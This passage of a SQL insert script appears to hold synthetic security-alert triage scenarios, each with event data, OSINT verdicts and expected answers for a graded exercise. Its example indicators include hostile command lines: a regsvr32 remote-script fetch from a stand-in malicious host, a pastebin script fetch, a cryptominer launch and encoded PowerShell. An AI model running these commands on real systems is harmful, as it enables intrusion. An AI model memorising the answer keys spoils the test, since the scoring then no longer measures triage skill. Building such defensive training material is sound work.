use of urgency suggest a targeted phishing attempt.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS'),
(736, 'Detected Command and Control Communication from Malware', 'critical', 'CrowdStrike', 'A malware infection was detected attempting to communicate with a known C2 server. The connection was initiated from an internal host.', 'Malware', 'T1105', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"203.0.113.89\",\"username\":\"user1@company.com\",\"hostname\":\"PC-003\",\"file_hash\":\"abcd1234efgh5678ijkl9012mnop3456\"}', '2026-01-10 14:58:13', '2026-01-11 15:09:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.89\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware C2 activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"abcd1234efgh5678ijkl9012mnop3456\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash found in several malware infections\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of infected host\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The communication to a known C2 server confirms the host is compromised.\"}', 'Intermediate', 'NDR', 5, 1, 'GOVERNMENT'),
(737, 'Failed Brute Force Login Attempts Detected', 'medium', 'Wazuh', 'Multiple failed login attempts were detected from a foreign IP address, indicating a potential brute force attack.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:30:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe@company.com\",\"hostname\":\"PC-004\",\"failed_attempts\":35}', '2026-01-11 11:45:57', '2026-01-11 15:09:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported several times for suspicious login activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of targeted host\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe@company.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"No additional suspicious activity detected for this user\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The number of failed attempts and foreign IP location indicate a brute force attack.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS'),
(738, 'Suspicious Email Flagged as Possible False Positive', 'low', 'Email Gateway', 'An email was flagged as suspicious due to its sender domain, but analysis shows it matches known safe entities.', 'Phishing', 'T1598', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.0.2.25\",\"dst_ip\":\"192.168.1.15\",\"username\":\"user2@company.com\",\"hostname\":\"WS-002\",\"email_sender\":\"newsletter@trustedsource.com\",\"email_subject\":\"Monthly Updates\"}', '2026-01-11 10:40:23', '2026-01-11 15:09:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"newsletter@trustedsource.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Sender domain verified as legitimate source\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.0.2.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"IP matches known safe email servers\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The sender and IP are verified as legitimate, indicating this is a false positive.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS'),
(739, 'APT-Level Phishing Attack via Spoofed Office365 Login Page', 'critical', 'Proofpoint', 'A spear phishing email was detected attempting to harvest credentials using a spoofed Office365 login page. The email was sent from a lookalike domain and contained urgency language.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:34Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"\",\"username\":\"jdoe@company.com\",\"hostname\":\"mail.company.com\",\"email_sender\":\"no-reply@0ffice365-security.com\",\"domain\":\"0ffice365-security.com\",\"url\":\"http://login-verifyoffice365.com\",\"email_subject\":\"Immediate Action Required: Verify Your Office365 Account\"}', '2026-01-11 14:23:02', '2026-01-11 15:10:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 157 times for phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"no-reply@0ffice365-security.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Lookalike domain used in phishing campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://login-verifyoffice365.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Phishing page mimicking Office365 login\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email originated from a known malicious IP and used a lookalike domain to deceive users into entering their credentials.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS'),
(740, 'Fileless Malware Detected via Process Hollowing', 'high', 'CrowdStrike', 'A process hollowing technique was detected on a user endpoint, indicating a potential fileless malware execution. The attack leveraged PowerShell with heavy obfuscation.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:30:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.45\",\"dst_ip\":\"\",\"username\":\"m.smith\",\"hostname\":\"DESKTOP-45KTHR\",\"command_line\":\"powershell -NoP -W Hidden -Enc dwBvAGsAZQBuAC0AUABvAHcAZQByAFMAYwBoAGUAbQBlACAAOwAgACQAbABvAGcAKwA=\"}', '2026-01-11 01:56:23', '2026-01-11 15:10:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -NoP -W Hidden -Enc dwBvAGsAZQBuAC0AUABvAHcAZQByAFMAYwBoAGUAbQBlACAAOwAgACQAbABvAGcAKwA=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of process hollowing\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_hash\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command suggests process hollowing, a common technique for fileless malware.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'),
(741, 'DGA Domain Detected in Network Traffic', 'medium', 'Firewall', 'Suspicious network traffic was detected involving a domain generated by a Domain Generation Algorithm (DGA), commonly used for C2 communication.', 'Command and Control', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:22:11Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"203.0.113.77\",\"username\":\"jane.doe\",\"hostname\":\"LAPTOP-JDOE\",\"domain\":\"gibberish12345.biz\"}', '2026-01-09 20:43:04', '2026-01-11 15:10:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple DGA domains\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"gibberish12345.biz\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Domain matches patterns used by DGA malware\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"isolate_host\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"command_and_control\",\"analysis_notes\":\"The domain and associated IP are indicative of DGA-based C2 communication.\"}', 'Expert', 'NDR', 9, 1, 'GOVERNMENT'),
(742, 'Failed Network Connection Attempt to Known Malicious IP', 'low', 'IDS', 'A network connection attempt was detected to an external IP previously reported for malicious activities. Further investigation revealed it was a benign service misconfiguration.', 'Network Anomaly', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T16:47:59Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"198.51.100.99\",\"username\":\"svc.account\",\"hostname\":\"SERV-01\"}', '2026-01-10 08:16:16', '2026-01-11 15:10:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the service account host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported for malicious activities but currently clean\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_anomaly\",\"analysis_notes\":\"The connection attempt to a previously malicious IP was due to a misconfigured service, resulting in a false positive.\"}', 'Expert', 'NDR', 9, 1, 'OT_ICS'),
(743, 'Suspicious AWS Lambda Invocation Detected', 'critical', 'AWS GuardDuty', 'A Lambda function was invoked with a payload indicative of crypto mining. The function leveraged multiple legitimate services as C2 channels.', 'Malware', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:23:45Z\",\"event_type\":\"lambda_invocation\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"203.0.113.56\",\"username\":\"aws_lambda_user\",\"hostname\":\"lambda-instance-01\",\"command_line\":\"python3 -c \'import urllib; urllib.request.urlopen(\\\"https://pastebin.com/raw/abcd1234\\\")\'\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\"}', '2026-01-11 09:40:26', '2026-01-11 15:12:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 237 times for suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known crypto mining malware\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"python3 -c \'import urllib; urllib.request.urlopen(\\\"https://pastebin.com/raw/abcd1234\\\")\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command uses pastebin to fetch remote scripts\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Lambda invocation detected with indicators pointing to crypto mining. IP and hash linked to malicious activity.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'),
(744, 'Azure AD Privilege Escalation Attempt', 'high', 'Microsoft Sentinel', 'Anomalous activity detected with Azure AD privileges being elevated using a compromised account. The activity was followed by suspicious PowerShell commands.', 'Lateral Movement', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T02:15:30Z\",\"event_type\":\"privilege_escalation\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"10.0.0.5\",\"username\":\"compromised_user\",\"hostname\":\"win-server-2026\",\"command_line\":\"powershell.exe -Enc JABjAGgAbwBjAGsAZQBBAHIAZQBBAE4AYQBsAHkAcwBpAHMA\"}', '2026-01-10 15:01:29', '2026-01-11 15:12:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -Enc JABjAGgAbwBjAGsAZQBBAHIAZQBBAE4AYQBsAHkAcwBpAHMA\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command indicative of privilege escalation\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Privilege escalation detected with encoded PowerShell indicative of malicious intent.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'),
(745, 'Potential Data Exfiltration via Exposed S3 Bucket', 'high', 'AWS CloudTrail', 'Sensitive data was accessed from an exposed S3 bucket by a foreign IP, suggesting data exfiltration.', 'Data Exfil', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:40:12Z\",\"event_type\":\"data_access\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"192.0.2.44\",\"username\":\"s3_data_user\",\"hostname\":\"s3-bucket-123\",\"request_body\":\"GET /sensitive-data.csv HTTP/1.1\"}', '2026-01-10 08:53:05', '2026-01-11 15:12:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for unauthorized data access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"GET /sensitive-data.csv HTTP/1.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Access to sensitive data file without authorization\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"review_bucket_permissions\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"IP involved in accessing exposed S3 bucket with sensitive data, indicative of data exfiltration.\"}', 'Expert', 'CLOUD', 9, 1, 'OT_ICS'),
(746, 'False Positive: Legitimate User Mistaken for Brute Force Attacker', 'medium', 'Splunk', 'Multiple login failures detected from an internal IP address. Investigation revealed a legitimate user mistyping their password.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T13:25:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.0.0.25\",\"dst_ip\":\"10.0.1.15\",\"username\":\"jane.doe\",\"hostname\":\"corp-laptop-01\",\"failed_attempts\":12}', '2026-01-09 22:57:28', '2026-01-11 15:12:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, no external threat detected\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jane.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Legitimate corporate user\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Login failures occurred due to user error; no malicious activity detected.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS'),
(747, 'Lateral Movement Detected Using LOLBins within Azure Environment', 'critical', 'Azure Sentinel', 'Suspicious regsvr32.exe execution detected on multiple internal hosts indicating potential lateral movement using LOLBins within Azure VMs.', 'Lateral Movement', 'T1218', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.8\",\"username\":\"jdoe\",\"hostname\":\"AzureVM01\",\"command_line\":\"regsvr32.exe /s /n /u /i:https://malicious-site.com/shell.sct scrobj.dll\"}', '2026-01-09 22:34:33', '2026-01-11 15:12:24', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.8\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target host\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"regsvr32.exe /s /n /u /i:https://malicious-site.com/shell.sct scrobj.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Command used for executing remote script leveraging regsvr32\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of regsvr32 to execute a remote script is indicative of an attempt to move laterally within the network.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'),
(748, 'Exposed S3 Bucket Detected, Potential Data Exposure', 'high', 'AWS GuardDuty', 'An S3 bucket was found to be publicly accessible, which could lead to unauthorized data exposure.', 'Data Exfiltration', 'T1530', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:30:00Z\",\"event_type\":\"bucket_policy_change\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"AWS\",\"username\":\"aws-user\",\"hostname\":\"N/A\",\"request_body\":\"{\\\"Action\\\":\\\"s3:GetObject\\\",\\\"Resource\\\":\\\"arn:aws:s3:::mybucket/*\\\",\\\"Effect\\\":\\\"Allow\\\",\\\"Principal\\\":\\\"*\\\"}\"}', '2026-01-11 12:33:53', '2026-01-11 15:12:24', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP previously reported for suspicious cloud activity\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"{\\\"Action\\\":\\\"s3:GetObject\\\",\\\"Resource\\\":\\\"arn:aws:s3:::mybucket/*\\\",\\\"Effect\\\":\\\"Allow\\\",\\\"Principal\\\":\\\"*\\\"}\",\"is_critical\":true,\"osint_result\":{\"source\":\"AWS Config\",\"verdict\":\"malicious\",\"details\":\"Bucket policy allows public access to all objects\"}}],\"expected_actions\":[\"block_ip\",\"close_bucket_policy\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Public access to S3 buckets can expose sensitive data. Immediate action required to close access.\"}', 'Advanced', 'DLP', 7, 1, 'OT_ICS'),
(749, 'Encoded PowerShell Command Execution Detected in GCP', 'critical', 'Google Cloud Security Command Center', 'An encoded PowerShell command was executed on a Google Cloud VM, indicative of possible malicious activity.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:15:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"N/A\",\"username\":\"admin\",\"hostname\":\"GCP-VM-01\",\"command_line\":\"powershell -enc aGVsbG8gd29ybGQ=\"}', '2026-01-10 13:25:27', '2026-01-11 15:12:24', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the GCP VM\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -enc aGVsbG8gd29ybGQ=\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command execution detected\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Encoded PowerShell commands are often used to evade detection and execute malicious payloads.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'),
(750, 'Suspicious Email Detected - Potential False Positive', 'medium', 'Proofpoint Email Gateway', 'An email containing a link to an external website was flagged as suspicious but appears to be from a trusted source.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:25:12Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.20\",\"username\":\"employee@example.com\",\"hostname\":\"N/A\",\"email_sender\":\"trusted.source@example.com\",\"request_body\":\"Please review the attached document: https://example-trusted-site.com/document\"}', '2026-01-10 11:44:36', '2026-01-11 15:12:24', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP associated with a trusted email provider\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"https://example-trusted-site.com/document\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"URL belongs to a trusted and verified domain\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"trusted.source@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"clean\",\"details\":\"Email address registered to a known and trusted organization\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Despite initial suspicion, the email was verified to be from a trusted source with clean OSINT results.\"}', 'Advanced', 'EDR', 7, 1, 'GOVERNMENT'),
(751, 'Potential Crypto Mining Activity on AWS EC2 Instance', 'high', 'AWS GuardDuty', 'GuardDuty detected anomalous CPU usage patterns consistent with crypto mining on an EC2 instance. This activity is often indicative of unauthorized resource usage.', 'Malware', 'T1496', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:23:45Z\",\"event_type\":\"anomalous_usage\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.78\",\"username\":\"ec2-user\",\"hostname\":\"ec2-192-168-1-10.compute-1.amazonaws.com\",\"command_line\":\"minerd --algo=cryptonight --url=stratum+tcp://203.0.113.78:3333 --userpass=user:pass\"}', '2026-01-10 12:48:36', '2026-01-11 15:12:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address belonging to AWS EC2 instance\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.78\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 547 times for crypto mining activities\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"minerd --algo=cryptonight --url=stratum+tcp://203.0.113.78:3333 --userpass=user:pass\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Known command line for crypto mining operations\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a known crypto mining command indicates unauthorized resource usage.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS'),
(752, 'Suspicious IAM Privilege Escalation in Azure', 'critical', 'Azure Sentinel', 'A user account was detected attempting to assign itself higher privileges through an unusual method. This could indicate a compromised account.', 'Lateral Movement', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:30Z\",\"event_type\":\"privilege_escalation\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"52.233.123.45\",\"username\":\"john.doe\",\"hostname\":\"azure-vm-01\",\"command_line\":\"az role assignment create --assignee john.doe --role Owner\"}', '2026-01-10 17:50:25', '2026-01-11 15:12:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of Azure VM\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"52.233.123.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in privilege escalation attempts\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"az role assignment create --assignee john.doe --role Owner\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command used for unauthorized privilege escalation\"}}],\"expected_actions\":[\"reset_credentials\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The command line used is indicative of unauthorized privilege escalation.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS'),
(753, 'Exposed S3 Bucket Detected in AWS', 'medium', 'AWS CloudTrail', 'A public read/write permission was detected on an S3 bucket, potentially exposing sensitive data.', 'Data Exfiltration', 'T1530', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:42:05Z\",\"event_type\":\"bucket_policy_change\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"13.54.32.123\",\"username\":\"admin\",\"hostname\":\"cloud.aws.local\",\"request_body\":\"{\\\"Bucket\\\":\\\"my-sensitive-bucket\\\",\\\"Policy\\\":\\\"PublicReadWrite\\\"}\"}', '2026-01-09 16:19:33', '2026-01-11 15:12:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of AWS management console\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"{\\\"Bucket\\\":\\\"my-sensitive-bucket\\\",\\\"Policy\\\":\\\"PublicReadWrite\\\"}\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Exposing S3 bucket with public read/write permissions\"}}],\"expected_actions\":[\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Public read/write permissions on a sensitive S3 bucket are a security risk.\"}', 'Intermediate', 'CLOUD', 5, 1, 'OT_ICS'),
(754, 'False Positive: Unusual Login Attempt Detected', 'low', 'Splunk', 'A login attempt from a new location was detected for user \'alice.smith\', but further investigation revealed this was a legitimate business trip.', 'Credential Attack', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:50:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.101\",\"dst_ip\":\"203.0.113.10\",\"username\":\"alice.smith\",\"hostname\":\"vpn.company.com\",\"failed_attempts\":\"3\"}', '2026-01-10 10:38:35', '2026-01-11 15:12:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP not reported for malicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"alice.smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"clean\",\"details\":\"User confirmed to be on a business trip\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The user\'s travel itinerary confirms this was a legitimate login attempt.\"}', 